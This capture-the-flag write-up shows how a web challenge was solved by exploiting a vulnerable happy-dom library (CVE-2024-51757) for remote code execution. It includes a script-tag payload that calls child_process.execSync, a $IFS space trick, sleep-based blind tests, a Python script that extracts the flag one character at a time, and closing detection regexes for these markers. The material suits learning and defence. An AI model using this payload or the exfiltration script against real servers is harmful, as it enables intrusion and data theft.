
# Blackhat - Saudi \<Web> iFrame

## Understand the objective

After unzipping the compressed file, this is what you get:

<figure><img src="/files/okytTDEnRYaQbUN9BdPZ" alt=""><figcaption></figcaption></figure>

We now know the flag comes from that C file, which should be compiled into an executable.

<figure><img src="/files/2I0hxK047RMN0Nc5WmiG" alt=""><figcaption></figcaption></figure>

As we can see, run.sh compiles flag.c with gcc and places the binary in the root of the machine, "/".

<figure><img src="/files/dzhPLpWyOGUycTGtQpiZ" alt=""><figcaption></figcaption></figure>

The Dockerfile performs all the steps needed to build the machine and, at the end, executes the run script that builds the flag binary. So far the clue is that we need RCE to get the flag.

### Find the RCE + Exploit it

Now our task is to find an RCE to get that flag, so we do some source code review looking for any possible way to get code execution. I found that the **package.json** file pulls in a vulnerable version of the happy-dom library.

<figure><img src="/files/BQ3DzkTqr8pfSlqN5TP9" alt=""><figcaption></figcaption></figure>

Googling that library for a CVE gives you plenty of results for a recent 2024 CVE.

<figure><img src="/files/aDNsnA9AHMR7qzTvfnw7" alt=""><figcaption><p>CVE-2024-51757</p></figcaption></figure>

<figure><img src="/files/bBqoQBaBmml4gbEjDp1S" alt=""><figcaption></figcaption></figure>

#### Exploit the RCE

Applying this to our CTF scenario requires a few modifications to suit how the requests are handled. Reviewing the index.js file:

<figure><img src="/files/iSM2wCqFXTVmPLf6Iskn" alt=""><figcaption></figcaption></figure>

Clearly the /api/scrape endpoint is what interests us here.

In this POST endpoint the data is sent as JSON. The key carrying the HTML content is `html`, and its value should be a string containing the HTML of a web page. That value must hold the entire HTML of the page, including the surrounding page tags, and a meta tag with `name` and `content` attributes; that meta tag is specifically what the endpoint needs in order to extract the description.

Below is an example of a valid and an invalid POST request according to the code. With ChatGPT's help you can get an example of accepted HTML to pass as the key's value.

<figure><img src="/files/iS2bagcblQjFX8SOpYLb" alt=""><figcaption><p>Valid request</p></figcaption></figure>

<figure><img src="/files/x7m8nM6UmhLHdaFOn1bM" alt=""><figcaption><p>invalid request</p></figcaption></figure>

We can inject our payload in the body tag. I first tried to execute a single command, "ps".

<figure><img src="/files/6CJR9mBHwrXnMwOWu6rE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/p8p0PO0Aituu8kEzv4b7" alt=""><figcaption></figcaption></figure>

As you can see: (1) the payload we execute is reflected in the server debugger, and (2) we can observe the command being executed in the system processes.

That means our RCE executed successfully. Let's try to create a new file in the /tmp folder.

<figure><img src="/files/tm5ydp9nIaCaTxp9VbSK" alt=""><figcaption></figcaption></figure>

As we can see, the server receives the request and URL-encodes it, then passes it to the system to execute. A command containing URL-encoded characters cannot be executed, so instead of a literal space we use $IFS, the shell's field separator variable, which the shell expands to whitespace on its own. Read below for more information about IFS.

{% embed url="https://bash.cyberciti.biz/guide/$IFS" %}

Now we replace the space with $IFS:

<figure><img src="/files/iBtqnTjgYH32ZapEMtpN" alt=""><figcaption></figcaption></figure>

#### Blind Data exfiltration

Now it's time to exfiltrate the data via the command injection, but we are doing that blindly, so first let's find the right command. We use a sleep delay to confirm the correct letter at each offset: the request only takes longer when the guessed character matches.

```bash
if [[ $(whoami | cut -c 1) == "r" ]]; then sleep 5; fi
```

Also we can do:

```bash
FLAG=$(/flag) && [ "$(expr substr $FLAG 1 1)" == "f" ] && sleep 5
```

/flag is the compiled executable.

Combining these commands, and with big thanks to my colleague @**Zeenbleed** for creating this script to exfiltrate the data:

```python
import requests
import time
import string
import urllib.parse

def generate_payload(i):
    # One payload per printable character: compare character i of the
    # /flag output with the candidate and sleep 2s only when it matches.
    for ii in string.printable:
        payload = f"FLAG=$(/flag) && [ \"$(expr substr $FLAG {i} 1)\" == \"{ii}\" ] && sleep 2"
        encoded_payload = urllib.parse.quote(payload)
        yield encoded_payload, ii

def send_request(payload):
    # Deliver the URL-encoded command inside the script tag; the server
    # decodes it with decodeURIComponent before execSync runs it.
    url = "http://localhost:5000/api/scrape"
    headers = {'Content-Type': 'application/json'}
    data = {
        "html": "<html><head><title>Test Page</title><meta name=description content=xxxxxxx></head><body><h1>Hello World</h1><script src=\"http://localhost:1000/',options,'');\
require('child_process').execSync(decodeURIComponent('@@'));\
sendRequest('http://localhost:1000/\"></script></body></html>".replace('@@', payload)
    }

    start_time = time.time()
    try:
        requests.post(url, json=data, headers=headers, timeout=4)
    except requests.exceptions.ReadTimeout:
        pass
    # Only the elapsed time matters: the response body tells us nothing.
    return time.time() - start_time

# Walk the flag one offset at a time. A response slower than the 2s sleep
# means the candidate character matched; a response slower than 3s is
# treated as a timeout or network hiccup and the same probe is retried.
for i in range(1, 100):
    for payload, char in generate_payload(i):
        while True:
            response_time = send_request(payload)
            if response_time > 3:
                continue
            if response_time > 2:
                print(response_time, char)
            break
```

<figure><img src="/files/QUleWvf8FrHxXht3EJCR" alt=""><figcaption></figcaption></figure>
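From the defender's side, the two things that give this attack away are a `<script>` tag carrying Node code inside the submitted `html` field and a burst of `/api/scrape` requests whose durations cluster around the sleep delay. The detection logic below is an added example, not part of the original write-up; it runs over constructed JSON request log lines, and the log format and field names (`id`, `src`, `path`, `duration_ms`, `html`) are my assumption.

```python
import json
import re
from collections import defaultdict

# Markers seen in the injected payload on this page: Node's child_process
# module, a require() call and the $IFS space-replacement trick.
SCRIPT_RE = re.compile(r"<script[^>]*>", re.IGNORECASE)
NODE_RE = re.compile(r"child_process|execSync|require\(|\$IFS", re.IGNORECASE)

def scan_request(entry):
    """Return the reasons a single /api/scrape request looks like the exploit."""
    reasons = []
    if entry.get("path") != "/api/scrape":
        return reasons
    html = entry.get("html", "")
    if SCRIPT_RE.search(html):
        reasons.append("script tag in submitted html")
    if NODE_RE.search(html):
        reasons.append("node/shell execution keywords in submitted html")
    return reasons

def timing_probe_sources(entries, delay_ms=2000, tolerance_ms=300, min_hits=5):
    """Sources whose scrape requests repeatedly take ~delay_ms: the signature
    of sleep-based blind exfiltration, one slow request per matched character."""
    hits = defaultdict(int)
    for e in entries:
        if e.get("path") == "/api/scrape" and abs(e.get("duration_ms", 0) - delay_ms) <= tolerance_ms:
            hits[e.get("src")] += 1
    return {src: n for src, n in hits.items() if n >= min_hits}

def analyse(log_lines):
    """Parse JSON log lines; return (flagged requests by id, timing-probe sources)."""
    entries = [json.loads(line) for line in log_lines]
    flagged = {}
    for e in entries:
        reasons = scan_request(e)
        if reasons:
            flagged[e["id"]] = reasons
    return flagged, timing_probe_sources(entries)

# Constructed sample log: one benign request, one injection, five timing probes.
SAMPLE_LOG = [
    json.dumps({"id": 1, "src": "10.0.0.9", "path": "/api/scrape", "duration_ms": 40,
                "html": "<html><head><meta name=description content=ok></head><body></body></html>"}),
    json.dumps({"id": 2, "src": "10.0.0.5", "path": "/api/scrape", "duration_ms": 2050,
                "html": "<html><body><script src=\"x');require('child_process').execSync('sleep$IFS2')\"></script></body></html>"}),
] + [json.dumps({"id": 3 + k, "src": "10.0.0.5", "path": "/api/scrape", "duration_ms": 1990 + k,
                 "html": "<html><body><h1>x</h1></body></html>"}) for k in range(5)]

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

The timing heuristic works on its own even if the attacker obfuscates the script body, because the sleep-based probe still has to produce a fixed delay on every hit.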
